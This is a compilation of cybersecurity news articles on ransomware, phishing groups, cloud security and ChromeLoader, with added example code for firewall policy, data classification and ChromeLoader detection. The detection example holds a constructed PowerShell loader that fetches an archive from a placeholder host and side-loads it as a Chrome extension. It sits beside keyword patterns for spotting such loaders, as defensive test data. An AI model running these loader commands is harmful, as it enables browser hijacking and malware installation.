The Rise of Manual Techniques in Ransomware Attacks: A Growing Threat

A recent report by CrowdStrike highlights a disturbing trend: the increasing use of manual techniques in ransomware attacks. This shift towards hands-on-keyboard activity is making these attacks more sophisticated and harder to detect and contain.

The Surge in Interactive Intrusions

According to CrowdStrike's findings, interactive intrusions rose by 55% over the past year. These intrusions, characterised by a human operator at the keyboard rather than automated scripts, account for nearly 90% of e-crime activity. The trend marks a shift in criminal tradecraft: attackers now rely on manual techniques to work around security controls that were tuned to catch automated malware.

Why Manual Techniques?

The adoption of manual techniques in ransomware attacks offers several advantages to cybercriminals. Firstly, these techniques allow attackers to adapt and respond in real-time to the defenses they encounter. Unlike automated attacks, which follow predefined scripts, manual intrusions enable attackers to think on their feet, making it harder for security systems to predict and counter their moves.

Secondly, manual techniques often involve the use of legitimate tools and credentials, making it difficult for security teams to distinguish between malicious and benign activities. This tactic, known as “living off the land,” involves using tools that are already present in the target environment, such as PowerShell or Remote Desktop Protocol (RDP). By blending in with normal network traffic, attackers can evade detection for extended periods, increasing the likelihood of a successful attack.

The Impact on the Technology Sector

The technology sector has been particularly hard-hit by this surge in manual ransomware attacks. CrowdStrike’s report indicates a 60% rise in such attacks targeting tech companies. This sector is an attractive target for cybercriminals due to its vast repositories of sensitive data and intellectual property. Additionally, technology companies often have complex and interconnected systems, providing multiple entry points for attackers to exploit.

The consequences of a successful ransomware attack on a tech company can be devastating. Beyond the immediate financial losses from ransom payments, these attacks can lead to prolonged downtime, loss of customer trust, and significant reputational damage. In some cases, the recovery process can take months, further compounding the financial and operational impact.

What to do?

Enhanced Monitoring and Detection: Implement advanced monitoring tools that can detect anomalous behavior indicative of manual intrusions. Behavioural analytics and machine learning can help identify patterns that deviate from the norm, providing early warning signs of an attack.

Regular Security Training: Educate employees about the latest phishing techniques and social engineering tactics used by cybercriminals. Regular training sessions can help staff recognize and report suspicious activities, reducing the risk of initial compromise.

Zero Trust Architecture: Adopt a Zero Trust approach to security, where no user or device is trusted by default. Implement strict access controls and continuously verify the identity and integrity of users and devices accessing the network.

Incident Response Planning: Develop and regularly update an incident response plan that outlines the steps to take in the event of a ransomware attack. Conduct regular drills to ensure that all team members are familiar with their roles and responsibilities during an incident.

Backup and Recovery: Maintain regular backups of critical data and ensure that these backups are stored securely, offline or otherwise isolated from the production network so that an intruder with domain-level access cannot encrypt or delete them. Regularly test the recovery process to ensure that data can be restored quickly in the event of an attack.

Moroccan Cybercrime Group Storm-0539 Exploits Gift Card Systems with Advanced Phishing Attacks

 

A Morocco-based cybercrime group, Storm-0539, is making headlines for its sophisticated email and SMS phishing attacks aimed at stealing and reselling gift cards. Microsoft's latest Cyber Signals report reveals that this group is responsible for significant financial theft, with some companies losing up to $100,000 daily. 

First identified by Microsoft in December 2023, Storm-0539, also known as Atlas Lion, has been active since late 2021. The group employs social engineering techniques to harvest victims' credentials through adversary-in-the-middle (AitM) phishing pages. They exploit this access to register their own devices, bypass authentication, and maintain persistent access to create fraudulent gift cards. 

The group's attack strategy includes gaining covert access to cloud environments for extensive reconnaissance, targeting large retailers, luxury brands, and fast-food chains. They aim to redeem and sell gift cards on black markets or use money mules to cash out. This marks an evolution from their previous tactics of stealing payment card data via malware on point-of-sale (PoS) devices. 

Microsoft noted a 30% increase in Storm-0539's activity between March and May 2024, and emphasised the group's deep understanding of cloud systems, which it uses to manipulate gift card issuance processes. In addition to stealing login credentials, Storm-0539 targets secure shell (SSH) passwords and keys, which are either sold or used for further attacks. The group sends phishing emails through internal company mailing lists to enhance their credibility, and sets up new phishing websites by abusing free trial or student accounts on cloud platforms.

The FBI has warned about Storm-0539's smishing attacks on retail gift card departments, using sophisticated phishing kits to bypass multi-factor authentication (MFA). The group's ability to adapt and pivot tactics after detection underscores their persistence and resourcefulness. Microsoft urges companies to monitor gift card portals closely and implement conditional access policies to strengthen security. They highlight the effectiveness of using additional identity-driven signals, such as IP address and device status, alongside MFA. 

Meanwhile, Enea researchers have identified broader criminal campaigns exploiting cloud storage services like Amazon S3 and Google Cloud Storage for SMS-based gift card scams. These scams use legitimate-looking URLs to bypass firewalls and redirect users to malicious websites that steal sensitive information. 

Storm-0539's operations exemplify the increasing sophistication of financially motivated cybercriminals, borrowing techniques from state-sponsored actors to remain undetected. As these threats evolve, robust cybersecurity measures and vigilant monitoring are crucial to protect sensitive information and financial assets.

Empowering Indigenous Data Sovereignty: The TTP-Microsoft Partnership

 

The recent partnership between Te Tumu Paeroa (TTP), the office of the Māori Trustee, and Microsoft for the forthcoming data centres in Aotearoa New Zealand has been described as "groundbreaking", with potential global implications for indigenous data sovereignty. The agreement is based on TTP's Māori data sovereignty framework, which has been under development for the past three years.

As anchor tenants for Microsoft's data centres, TTP will play a pivotal role in safeguarding Māori data as a precious asset in an increasingly digital world. Ruth Russell, Te Tumu Paeroa’s Kaitautari Pārongo Matua (Chief Information Officer), emphasized the significance of protecting Māori data, describing it as a "taonga" or treasure. Anchor tenancy enables TTP to host data in Aotearoa, ensuring it remains within the country's sovereign borders. 

The agreement aims to deepen connections between landowners and their whenua (land) and facilitate faster recovery from major weather events while supporting innovation on key issues such as climate change. TTP's services include trust administration, property management, income distribution, and client fund management, making this partnership crucial for enhancing Māori data sovereignty. One of the primary benefits of the new cloud service is that data stored at the centre will not leave New Zealand's sovereign borders, ensuring compliance with local laws and regulations. 

This advanced data residency feature offered by Microsoft instills confidence that data resides in the desired territory, aligning with TTP's framework and recognizing the sovereignty of Māori data. Dan Te Whenua Walker from Microsoft highlights the opportunity for Māori to leverage artificial intelligence (AI) while acknowledging some uncertainties regarding its cultural implications. He emphasizes the importance of TTP's framework in guiding the adoption of AI, ensuring it aligns with Māori aspirations and values. DDS IT, responsible for migrating data to Microsoft's cloud servers, considers this partnership a unique opportunity. The data migration process involves transferring data between locations and formats, with the full transfer expected to take between 12 to 24 months. 

Moreover, the new data centre is set to be the most sustainable globally, emphasizing energy efficiency and environmental considerations. The partnership between TTP and Microsoft represents a significant step towards advancing Māori data sovereignty and leveraging technology to benefit indigenous communities. By hosting data within Aotearoa's sovereign borders and adhering to Māori principles of kaitiakitanga (guardianship), this collaboration sets a precedent for indigenous data governance worldwide.

Bridging the Gap Between Cloud vs On-premise Security

 

The cloud era is well under way and the market keeps shifting. Enterprises that want to stay relevant in this competitive environment are clearly eager to adopt cloud technologies. What motivates this significant shift, and what does it mean for how security is delivered?

Cloud-centric security strategies, exemplified by initiatives like Secure Access Service Edge (SASE) and Security Service Edge (SSE), encompassing components such as Secure Web Gateway (SWG), Cloud Access Security Brokers (CASB), Data Loss Prevention (DLP), and Zero Trust Network Access (ZTNA), efficiently extend security to wherever corporate users, devices, and resources are located—leveraging the cloud as the central hub. 

With all security functionalities seamlessly delivered and managed through a unified interface, the security of both inbound and outbound traffic, often referred to as north-south traffic, is significantly fortified. 

On the flip side, the internal network's east-west traffic, which moves within the confines of data centers and the network but does not cross the network perimeter, remains untouched by the security checks implemented through cloud-based measures. 

A potential workaround involves keeping a traditional data center firewall dedicated to overseeing and regulating internal, east-west traffic. However, this hybrid security approach introduces increased expenses and intricacies in handling diverse security solutions. Many organizations strive to address these challenges by opting for integrated, cloud-based security stacks to streamline management and mitigate the complexities associated with maintaining separate security measures. 

To ensure comprehensive security coverage for organizations, a solution is required that safeguards both north-south and east-west traffic. The key lies in orchestration through a centralized, cloud-based console. Achieving this can be approached in two ways: 

1. Via WAN Firewall Policy 

Cloud-native security frameworks like SASE and SSE can provide east-west protection by directing internal traffic through the nearest point of presence (PoP). Unlike traditional local firewalls with their own setup limitations, SSE PoP allows firewall policies to be managed centrally through the platform's console. Admins can easily create access rules in the unified console, such as permitting authorized users on the corporate VLAN with approved, Active Directory-registered devices to access specific resources in the on-premise data center, following Zero Trust Network Access (ZTNA) principles. 

2. Via LAN Firewall Policy 

Consider a security-conscious scenario in which a CCTV camera on an IoT VLAN needs access to an internal server. Disabling the camera's default internet/WAN access is wise, since the device has no business reaching the internet. But that creates a gap: data centre firewall policies enforced at the Point of Presence (PoP) only see traffic that reaches the PoP, so they cannot govern a device such as an IoT camera whose traffic never leaves the LAN.

SASE and SSE platforms address this by empowering administrators to set firewall policies on the local SD-WAN device. Organizations connect to SASE/SSE PoPs through this SD-WAN device, allowing direct rule configuration for internal LAN traffic. Pre-defined LAN firewall policies are locally enforced, with unmatched traffic sent to the PoP for further assessment, enhancing security management efficiency.
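The following is an added example, not code from any SASE/SSE vendor: a minimal first-match LAN firewall policy evaluator of the kind the SD-WAN edge device applies locally before handing unmatched flows to the PoP. The VLAN ranges, the video server address and the rule names are constructed for the scenario above.

```python
from __future__ import annotations

from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Added example (not vendor code): first-match LAN firewall policy evaluated on
# the SD-WAN edge. Anything no local rule covers is forwarded to the SASE/SSE
# PoP for the centrally managed WAN firewall policy. All addresses are made up.

@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int

@dataclass(frozen=True)
class Rule:
    name: str
    src_net: str
    dst: str            # CIDR, or the literal "internet" meaning any non-RFC1918 address
    dports: frozenset   # empty set = any port
    action: str         # "allow" or "deny"

RFC1918 = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_internal(addr: str) -> bool:
    """True for private (RFC 1918) addresses, i.e. LAN / data centre destinations."""
    a = ip_address(addr)
    return any(a in n for n in RFC1918)

def _dst_matches(rule: Rule, dst: str) -> bool:
    if rule.dst == "internet":
        return not is_internal(dst)
    return ip_address(dst) in ip_network(rule.dst)

def evaluate(flow: Flow, policy: list[Rule]) -> tuple[str, str | None]:
    """First matching rule wins; a flow no LAN rule covers is sent on to the PoP."""
    for rule in policy:
        if ip_address(flow.src) not in ip_network(rule.src_net):
            continue
        if not _dst_matches(rule, flow.dst):
            continue
        if rule.dports and flow.dport not in rule.dports:
            continue
        return rule.action, rule.name
    return "forward-to-pop", None

# Constructed policy for the text's scenario: IoT VLAN 10.20.0.0/24; cameras may
# only talk to the video server 10.10.0.50 in the data centre (RTSP/HTTPS), never
# to the internet, and never laterally to other internal hosts.
LAN_POLICY = [
    Rule("cctv-to-video-server", "10.20.0.0/24", "10.10.0.50/32", frozenset({554, 443}), "allow"),
    Rule("iot-no-internet",      "10.20.0.0/24", "internet",      frozenset(),          "deny"),
    Rule("iot-no-lateral",       "10.20.0.0/24", "10.0.0.0/8",    frozenset(),          "deny"),
]

if __name__ == "__main__":
    samples = [
        Flow("10.20.0.7", "10.10.0.50", 554),   # camera streaming to the video server
        Flow("10.20.0.7", "203.0.113.9", 443),  # camera calling out to the internet
        Flow("10.20.0.7", "10.10.0.20", 445),   # camera probing another internal host
        Flow("10.30.0.12", "10.10.0.20", 445),  # corporate VLAN: no local rule, goes to the PoP
    ]
    for f in samples:
        print(f, "->", evaluate(f, LAN_POLICY))
```

Rule order matters: the narrow allow sits before the broad denies, and the final fall-through is "forward-to-pop" rather than an implicit deny, which is what lets the centrally managed WAN policy still apply ZTNA checks to the corporate VLAN flow.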

Vietnamese Cybercriminals Exploit Malvertising to Target Facebook Business Accounts

Cybercriminals associated with the Vietnamese cybercrime ecosystem are exploiting social media platforms, including Meta-owned Facebook, as a means to distribute malware. 

According to Mohammad Kazem Hassan Nejad, a researcher from WithSecure, malicious actors have been utilizing deceptive ads to target victims with various scams and malvertising schemes. This tactic has become even more lucrative with businesses increasingly using social media for advertising, providing attackers with a new type of attack vector – hijacking business accounts.

Over the past year, cyber attacks against Meta Business and Facebook accounts have gained popularity, primarily driven by activity clusters like Ducktail and NodeStealer, known for targeting businesses and individuals operating on Facebook. 

Social engineering plays a crucial role in gaining unauthorized access to user accounts, with victims being approached through platforms such as Facebook, LinkedIn, WhatsApp, and freelance job portals like Upwork. Search engine poisoning is another method employed to promote fake software, including CapCut, Notepad++, OpenAI ChatGPT, Google Bard, and Meta Threads.

Common tactics among these cybercrime groups include the misuse of URL shorteners, the use of Telegram for command-and-control (C2), and legitimate cloud services like Trello, Discord, Dropbox, iCloud, OneDrive, and Mediafire to host malicious payloads.

Ducktail, for instance, employs lures related to branding and marketing projects to infiltrate individuals and businesses on Meta's Business platform. In recent attacks, job and recruitment-related themes have been used to activate infections. 

Potential targets are directed to fraudulent job postings on platforms like Upwork and Freelancer through Facebook ads or LinkedIn InMail. These postings contain links to compromised job description files hosted on cloud storage providers, leading to the deployment of the Ducktail stealer malware.

The Ducktail malware is designed to steal saved session cookies from browsers, with specific code tailored to take over Facebook business accounts. These compromised accounts are sold on underground marketplaces, fetching prices ranging from $15 to $340.

Recent attack sequences observed between February and March 2023 involve the use of shortcut and PowerShell files to download and launch the final malware. The malware has evolved to harvest personal information from various platforms, including X (formerly Twitter), TikTok Business, and Google Ads. It also uses stolen Facebook session cookies to create fraudulent ads and gain elevated privileges.

One of the primary methods used to take over a victim's compromised account involves adding the attacker's email address, changing the password, and locking the victim out of their Facebook account.

The malware has incorporated new features, such as using RestartManager (RM) to kill processes that lock browser databases, a technique commonly found in ransomware. Additionally, the final payload is obfuscated using a loader to dynamically decrypt and execute it, making analysis and detection more challenging.

To hinder analysis efforts, the threat actors use uniquely generated assembly names and rely on SmartAssembly, bloating, and compression to obfuscate the malware.

Researchers from Zscaler also observed instances where the threat actors initiated contact using compromised LinkedIn accounts belonging to users in the digital marketing field, leveraging the authenticity of these accounts to aid in social engineering tactics. This highlights the worm-like propagation of Ducktail, where stolen LinkedIn credentials and cookies are used to log in to victims' accounts and expand their reach.

Ducktail is just one of many Vietnamese threat actors employing shared tools and tactics for fraudulent schemes. A Ducktail copycat known as Duckport, which emerged in late March 2023, engages in information stealing and Meta Business account hijacking. Notably, Duckport differs from Ducktail in terms of Telegram channels used for command and control, source code implementation, and distribution, making them distinct threats.

Duckport employs a unique technique of sending victims links to branded sites related to the impersonated brand or company, redirecting them to download malicious archives from file hosting services. Unlike Ducktail, Duckport replaces Telegram as a channel for passing commands to victims' machines and incorporates additional information stealing and account hijacking capabilities, along with taking screenshots and abusing online note-taking services as part of its command and control chain.

"The Vietnamese-centric element of these threats and high degree of overlaps in terms of capabilities, infrastructure, and victimology suggests active working relationships between various threat actors, shared tooling and TTPs across these threat groups, or a fractured and service-oriented Vietnamese cybercriminal ecosystem (akin to ransomware-as-a-service model) centered around social media platforms such as Facebook," WithSecure said.

Remote Work and the Cloud Create Various Endpoint Security Challenges

At the recent Syxsense Synergy event, cybersecurity experts delved into the ever-evolving challenges faced by security and endpoint management. With the increasing complexity of cloud technologies, advancements in the Internet of Things, and the widespread adoption of remote work, the landscape of cybersecurity has become more intricate than ever before. 

These experts shed light on the pressing issues surrounding this field. Based on a survey conducted by the Enterprise Strategy Group (ESG), it has been discovered that the average user presently possesses approximately seven devices for both personal and office use. 

Moreover, the ESG survey revealed a notable connection between the number of security and endpoint management tools employed within an enterprise and the frequency of breaches experienced. Among the organizations surveyed, 6% utilized fewer than five tools, while 27% employed 5 to 10 tools. 33% of organizations employed 11 to 15 tools, whereas the remaining organizations implemented more than 15 tools to manage their security and endpoints. 

What are endpoints, and why does their security matter when working remotely?

Endpoints encompass various physical devices that establish connections with computer networks, facilitating the exchange of information. These devices span a wide range, including mobile devices, desktop computers, virtual machines, embedded devices, and servers. 

Additionally, endpoints extend to Internet-of-Things (IoT) devices such as cameras, lighting systems, refrigerators, security systems, smart speakers, and thermostats. When a device such as a laptop connects to a network, the exchange of information between the device and the network is analogous to a conversation between two people over a phone call.

Endpoints are attractive targets for cybercriminals due to their vulnerability and their role as gateways to corporate data. As the workforce becomes more distributed, protecting endpoints has become increasingly challenging. Small businesses are particularly vulnerable, as they can serve as entry points for criminals to target larger organizations, often lacking robust cybersecurity defenses. 

Data breaches are financially devastating for enterprises, with the global average cost being $4.24 million and $9.05 million in the United States. Remote work-related breaches incur an additional average cost of $1.05 million. The majority of breach costs are attributed to lost business, including customer turnover, revenue loss from system downtime, and the expenses of rebuilding reputation and acquiring new customers. 

With the increasing mobility of workforces, organizations face a range of endpoint security risks. These common threats include: 

Phishing: A form of social engineering attack that manipulates individuals into divulging sensitive information. 

Ransomware: Malicious software that encrypts a victim's data and demands a ransom for its release.

Device loss: Leading to data breaches and potential regulatory penalties, lost or stolen devices pose significant risks to organizations. 

Outdated patches: Failure to apply timely software updates leaves systems vulnerable, enabling exploitation by malicious actors. 

Malware ads (malvertising): Online advertisements are used as a medium to distribute malware and compromise systems. 

Drive-by downloads: Automated downloads of software onto devices without the user's knowledge or consent. 

According to Ashley Leonard, Syxsense founder and CEO, the biggest reason behind the growing endpoint security challenges is a lack of training. "If people are not properly trained and grooved in on their endpoint and security tools, you are going to find devices and systems misconfigured, not maintained properly, and with critical patches undeployed. Training is vital, but it is much easier to train people on a single tool," he added.

Growing Public Cloud Spending is Leading to a Shadow Data Risk


Public cloud spending and adoption continue to grow. Analysts forecast that organizations will spend $591.8 billion on cloud infrastructure and services this year, up 20.7% from last year. 

According to Forrester, the public cloud market is set to reach $1 trillion by 2026, with the lion's share of investment directed to the big four: Alibaba, Amazon Web Services, Google Cloud, and Microsoft. 

So, What Is Going On? 

In the wake of the pandemic, businesses hastened their cloud migration and reaped the rewards as cloud services sped up innovation, offered elasticity to adjust to changing demand, and scaled with expansion. Even as the C-suite reduces spending in other areas, there is clearly no going back. Demand for platform-as-a-service (PaaS), expected to reach $136 billion in 2023, and infrastructure-as-a-service (IaaS), expected to reach $150 billion, is particularly high. 

Still, this rapid growth, which caught business strategists and technologists by surprise, has its downsides. If organizations do not take the essential steps to secure their public cloud data, the risks are likely to grow considerably. 

Shadow Data Is Growing Due to Lax Security Controls 

The challenge posed by "shadow data", that is, public cloud data that is unknown to and uncontrolled by the organization, stems from a number of causes. Business users are creating their own applications, and developers are constantly spinning up new instances of their own code to build and test new applications. Many of these services retain and process critical data without the knowledge of the IT and security staff. Versioning, which allows several versions of an object to be kept in the same cloud bucket, adds further risk if retention and access policies are not set up correctly: a "deleted" copy of sensitive data may still be retrievable. 

Unmanaged data repositories are frequently ignored when the rate of innovation quickens. In addition, if third parties or unrelated individuals are given excessive access privileges, sensitive data that is adequately secured could be transferred to an unsafe location, copied there, or become vulnerable. 

Three Steps to Improve Public Cloud Data Security 

A large number of security experts (82%) are aware of, and in fact, concerned about the growing issues pertaining to the public cloud data security problem. These professionals can swiftly aid in minimizing the hazards by doing the following: 

  • Discover and Classify all Cloud Data 

Teams can automatically find all of their cloud data, not just known or tagged assets, thanks to a next-generation public cloud data security platform. All cloud data storages, including managed and unmanaged assets, virtual machines, shadow data stores, data caches and pipelines, and big data, are detected. This data is used by the platform to create an extensive, unified data catalog for multi-cloud environments used by enterprises. All sensitive data, including PII, PHI, and transaction data from the payment card industry (PCI), is carefully identified and categorized in the catalogs. 

  • Secure and Control Cloud Data 

With complete insight into their sensitive cloud data, security teams can apply and enforce the appropriate security policies and verify data settings against their organization's stated guardrails. Public cloud data security tooling can surface complex policy violations and help prioritize remediation by risk, based on data sensitivity, security posture, volume, and exposure. 

  • Remediate Risks and Monitor Activities Without Hindering the Data Flow 

This process is known as data security posture management (DSPM). It produces recommendations tailored to each cloud environment, which makes them more effective and relevant than generic guidance. 

Teams can then begin organizing sensitive data without interfering with corporate operations. Teams will be prompted by a public cloud data security platform to implement best practices, such as enabling encryption and restricting third-party access, and practicing greater data hygiene by eliminating unnecessary sensitive data from the environment. 

Moreover, security teams can utilize the platform to enable constant monitoring of data. This way, security experts can efficiently identify policy violations and ensure that the public cloud data is following the firm’s mentioned guidelines and security postures, no matter where it is stored, used, or transferred in the cloud.  
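The three steps above (discover and classify, check posture, prioritize remediation) can be illustrated end to end. What follows is an added example written for this page, not any vendor's DSPM product: a constructed inventory of cloud storage objects is classified for PII and payment card data, then scored by combining sensitivity with exposure (public access, missing encryption, and untagged "shadow" stores that nobody owns). The object names, content samples and weighting scheme are all assumptions for illustration.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Added example (not vendor DSPM code). Inventory entries, sample contents and
# the risk weights are constructed for illustration.

@dataclass(frozen=True)
class StoreObject:
    store: str        # bucket / container name
    key: str
    public: bool      # readable without authentication
    encrypted: bool   # server-side encryption enabled
    tagged: bool      # present in the IT/security asset inventory
    sample: str       # first bytes of the object (constructed)

EMAIL = re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b")
SSN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")
CARD = re.compile(r"\b(?:\d[ -]?){13,16}\b")

def luhn_ok(number: str) -> bool:
    """Luhn checksum, used to avoid flagging any 16-digit string as a card number."""
    digits = [int(c) for c in number if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def classify(text: str) -> set[str]:
    """Return the sensitivity labels found in a content sample."""
    labels: set[str] = set()
    if EMAIL.search(text) or SSN.search(text):
        labels.add("PII")
    if any(luhn_ok(m) for m in CARD.findall(text)):
        labels.add("PCI")
    return labels

WEIGHT = {"PCI": 3, "PII": 2}  # assumed sensitivity weights

def risk_score(obj: StoreObject, labels: set[str]) -> int:
    """Sensitivity x exposure; non-sensitive objects score zero regardless of posture."""
    sensitivity = sum(WEIGHT[label] for label in labels)
    if sensitivity == 0:
        return 0
    exposure = 1
    if obj.public:
        exposure += 3
    if not obj.encrypted:
        exposure += 1
    if not obj.tagged:
        exposure += 1   # shadow data: no owner, no policy applied
    return sensitivity * exposure

def assess(inventory: list[StoreObject]) -> list[tuple[int, str, str, list[str]]]:
    """Classify every object and return findings ordered highest risk first."""
    findings = []
    for obj in inventory:
        labels = classify(obj.sample)
        findings.append((risk_score(obj, labels), obj.store, obj.key, sorted(labels)))
    return sorted(findings, reverse=True)

# Constructed inventory: one untagged, public, unencrypted export holding both
# PII and a (test) card number, one well-managed HR file, one public dev dump,
# and a build cache with nothing sensitive in it.
SAMPLE_INVENTORY = [
    StoreObject("customer-exports", "2024/q1.csv", True, False, False,
                "alice@example.com,4111 1111 1111 1111"),
    StoreObject("hr-archive", "payroll.csv", False, True, True,
                "bob@example.com,123-45-6789"),
    StoreObject("dev-scratch", "dump.sql", True, True, False,
                "INSERT INTO users VALUES ('carol@example.com')"),
    StoreObject("build-cache", "ci/log.txt", False, True, False,
                "pipeline ok"),
]

if __name__ == "__main__":
    for score, store, key, labels in assess(SAMPLE_INVENTORY):
        print(f"{score:>3}  {store}/{key}  {labels}")
```

The ordering of the output is the point: the public, unencrypted, unowned export lands at the top even though the HR payroll file is arguably more sensitive, because exposure multiplies sensitivity. A real platform would pull `public`, `encrypted` and `tagged` from the cloud provider's APIs rather than from a hand-built list.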

A Large Number of Ventures Suffering From Cloud Security Attacks

Modern technology has made it possible for malicious actors to invade users' systems in a few steps, and cloud security is one area that has worked increasingly hard to protect users' data from them. 

Yet even the latest defences remain at risk: a report published by Snyk found that 80% of enterprises had suffered a cloud security incident in just the past 12 months. The rapid, wide adoption of cloud services, often ahead of the skills and controls needed to secure them, is considered a major reason for the growing number of cases. 

There have been several high-profile cloud security breaches. Accenture has suffered two. In 2017, one of the company's AWS S3 buckets was left unsecured and publicly accessible; it contained confidential API data, digital certificates, metadata and more, which attackers could use to extort the company. Then in 202 the firm was hit by LockBit ransomware. 
 
According to Snyk's report, 58% of respondents expected to face another cloud security attack in the future, and 25% feared they had already suffered a breach of their cloud storage without being aware of it. Such findings erode confidence in cloud security. And there are many cases like Accenture's, where organisations left their cloud storage open to the public without even basic security in place. 

Avi Shua, CEO and co-founder of Orca, stated that while the cloud platforms provide a safe foundation for data storage in cloud infrastructure, the state of the business's own workloads, identities and other assets in the cloud is equally responsible for the security of its public cloud data.

To make the best of cloud storage and avoid falling prey to cloud security problems, it is essential to bring in experts in cloud-native security. To prevent incidents like Accenture's from recurring, organisations and the relevant institutes must provide additional training and education on handling cloud security. Such situations cannot be dealt with without planning: companies should work to proper strategies and focus on how to avoid the risk of data theft.  

ChromeLoader Malware Hijacks Chrome Browser via Malicious Extension

 

The browser-hijacking malware called ChromeLoader is witnessing a new surge in activity since its discovery earlier this year, researchers at Red Canary, wrote in a blog post this week. 

ChromeLoader uses PowerShell, an automation and configuration management framework, to add a malicious extension to a victim's Chrome browser for nefarious purposes. The malicious extension drastically modifies the victim's web browser settings to show search results that promote unwanted software, fake giveaways, surveys, and adult games and dating sites. 

The malware's creators receive financial benefits due to the marketing affiliation from these ad-supported pages and redirect traffic to these commercial sites. There are multiple hijackers of this kind, but ChromeLoader is unique due to its persistence, volume, and infection route, which involves the aggressive use of PowerShell. 

Exploiting PowerShell 

According to Red Canary researchers, who have been tracking the strain since early February, the creators of the hijacker use a malicious ISO archive file to target their victims. ChromeLoader gets initial access into a system by being distributed as an ISO file that looks like a torrent or a cracked video game. The researchers have also noticed Twitter posts promoting cracked Android games and offering QR codes that lead to malware-hosting sites. 

When a victim double-clicks on the ISO file in Windows 10 or later, the ISO file will be mounted as a drive on the victim's machine. This ISO file contains an executable that pretends to be a game crack or keygen, using names like "CS_Installer.exe." 

Finally, ChromeLoader executes and decodes a PowerShell command that fetches an archive from a remote server and loads it as a Google Chrome extension. The PowerShell is launched from a scheduled task; once the task has run and the extension is loaded, the task is silently removed by invoking schtasks.exe, an anti-forensic step that removes a persistence artefact defenders would otherwise look for, and one that is often monitored less closely than the initial execution. 

"This is a novel method for loading a malicious extension into Chrome that I have not seen before, nor has it been observed by Red Canary's intelligence team in other malware," researchers said. "While other bad actors could capitalize on this method, they still need to place a portable executable on the victim machine to ultimately use the load-extension PowerShell technique." 

Additionally, the creators of ChromeLoader target macOS systems using DMG (Apple Disk Image) files, the native disk image format on macOS.

"To maintain persistence, the macOS variation of ChromeLoader will append a preference (`plist`) file to the `/Library/LaunchAgents` directory," explains Red Canary's report. "This ensures that every time a user logs into a graphical session, ChromeLoader's Bash script can continually run."
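The Windows chain above (scheduled task, encoded PowerShell, Chrome started with --load-extension, task self-deletion via schtasks.exe) can be detected from process-creation telemetry. The following is an added example written for this page, not Red Canary's code or ChromeLoader's; the events are constructed in a Sysmon Event ID 1 style, and the task name, paths, URL and loader script are placeholders rather than real indicators.

```python
"""Detection logic for the ChromeLoader execution chain described above.

Added example, not Red Canary's code. It scores process-creation events
(constructed below, Sysmon Event ID 1 style) for three steps the text
describes: encoded PowerShell launched from a scheduled task that fetches and
side-loads an extension, Chrome started with --load-extension by PowerShell,
and schtasks.exe deleting the task afterwards. All names are placeholders.
"""
import base64
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the script as UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Hypothetical loader script in the shape the text describes: download, unpack, side-load.
LOADER_SCRIPT = (
    "Invoke-WebRequest 'http://example.invalid/ext.zip' -OutFile \"$env:TEMP\\ext.zip\"; "
    "Expand-Archive \"$env:TEMP\\ext.zip\" \"$env:APPDATA\\ext\"; "
    "Start-Process chrome.exe \"--load-extension=$env:APPDATA\\ext\""
)
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CHROME_EXE = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SCHTASKS_EXE = r"C:\Windows\System32\schtasks.exe"

# Constructed sample telemetry: one infected host (WS01) and one developer host (DEV02).
SAMPLE_EVENTS = [
    ProcEvent("WS01", r"E:\CS_Installer.exe", SCHTASKS_EXE,
              f'schtasks.exe /create /tn "ChromeTask" /sc minute /mo 1 /tr "powershell.exe -NoP -W Hidden -enc {encode_ps(LOADER_SCRIPT)}"'),
    ProcEvent("WS01", r"C:\Windows\System32\svchost.exe", PS_EXE,       # Schedule service runs in svchost
              f"powershell.exe -NoP -W Hidden -enc {encode_ps(LOADER_SCRIPT)}"),
    ProcEvent("WS01", PS_EXE, CHROME_EXE,
              r'"chrome.exe" --load-extension=C:\Users\user\AppData\Roaming\ext'),
    ProcEvent("WS01", PS_EXE, SCHTASKS_EXE, 'schtasks.exe /delete /tn "ChromeTask" /f'),
    ProcEvent("DEV02", r"C:\Windows\explorer.exe", CHROME_EXE,           # developer loading an unpacked extension by hand
              r'"chrome.exe" --load-extension=C:\src\my-extension'),
]

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
LOADER_KEYWORDS = ("load-extension", "invoke-webrequest", "downloadstring", "expand-archive")


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand script, or '' if absent or undecodable."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify(ev: ProcEvent) -> Optional[str]:
    """Map one event to a rule name, or None if it matches nothing."""
    image, parent, cl = ev.image.lower(), ev.parent_image.lower(), ev.command_line.lower()
    if image.endswith("powershell.exe"):
        decoded = decode_encoded_command(ev.command_line).lower()
        if any(k in decoded for k in LOADER_KEYWORDS):
            return "encoded_powershell_extension_loader"
    if image.endswith("chrome.exe") and "--load-extension=" in cl and parent.endswith("powershell.exe"):
        return "chrome_load_extension_from_powershell"
    if image.endswith("schtasks.exe") and "/delete" in cl and parent.endswith("powershell.exe"):
        return "scheduled_task_self_delete"
    return None


CHAIN = {"encoded_powershell_extension_loader", "chrome_load_extension_from_powershell",
         "scheduled_task_self_delete"}


def detect(events: Iterable[ProcEvent]) -> Dict[str, Set[str]]:
    """Rule hits grouped per host."""
    hits: Dict[str, Set[str]] = defaultdict(set)
    for ev in events:
        rule = classify(ev)
        if rule:
            hits[ev.host].add(rule)
    return dict(hits)


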